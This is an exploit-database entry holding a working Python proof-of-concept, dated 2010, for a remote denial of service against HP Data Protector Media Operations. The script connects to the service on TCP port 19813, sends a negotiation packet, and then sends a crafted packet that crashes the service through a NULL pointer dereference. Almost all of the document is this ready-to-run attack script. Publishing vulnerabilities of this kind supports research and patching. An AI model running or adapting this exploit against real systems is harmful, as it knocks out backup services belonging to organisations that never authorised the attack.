HP Data Protector Media Operations NULL Pointer Dereference Remote DoS



EDB-ID: 15214 CVE: N/A OSVDB-ID: 68528
Author: d0lc3 Published: 2010-10-06 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#!/usr/bin/python

import socket,struct,sys,os

SIGN=0x04030201
cmd=0x01000000

def main():
	if len(sys.argv)!=2:
		print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
		sys.exit(0)
	
	else:
		host=sys.argv[1],19813	#default port TCP/19813

	if sys.platform=="win32":
	    os.system("cls")
	else:
	    os.system("clear")
	
	s=socket.socket()
	try:
		s.connect(host)
		s.recv(1024)
	except:
		print"[x] Error connecting to remote host! This is g00d :D."
		sys.exit(0)
	print"[+] Building crafted packets..."
	#packet negotiation request
	pktnego=struct.pack(">L",cmd+0x1)		#+0
	pktnego+=struct.pack("<L",0x00000000)		#+4
	pktnego+=struct.pack("<L",SIGN)			#+8 (signature)
	#packet crash
	pkt1=struct.pack("<L",cmd+0x2)
	pkt1+=struct.pack(">L",0x00000001)		# != 0x0
	pkt1+=struct.pack("<L",SIGN)
	#end	
	print"[+] Negotiation."
	s.send(pktnego)
	s.recv(1024)
	s.send(pkt1)#crash!
	s.close()

if __name__=="__main__":
	main()
#PoC: http://www.exploit-db.com/sploits/15214.zip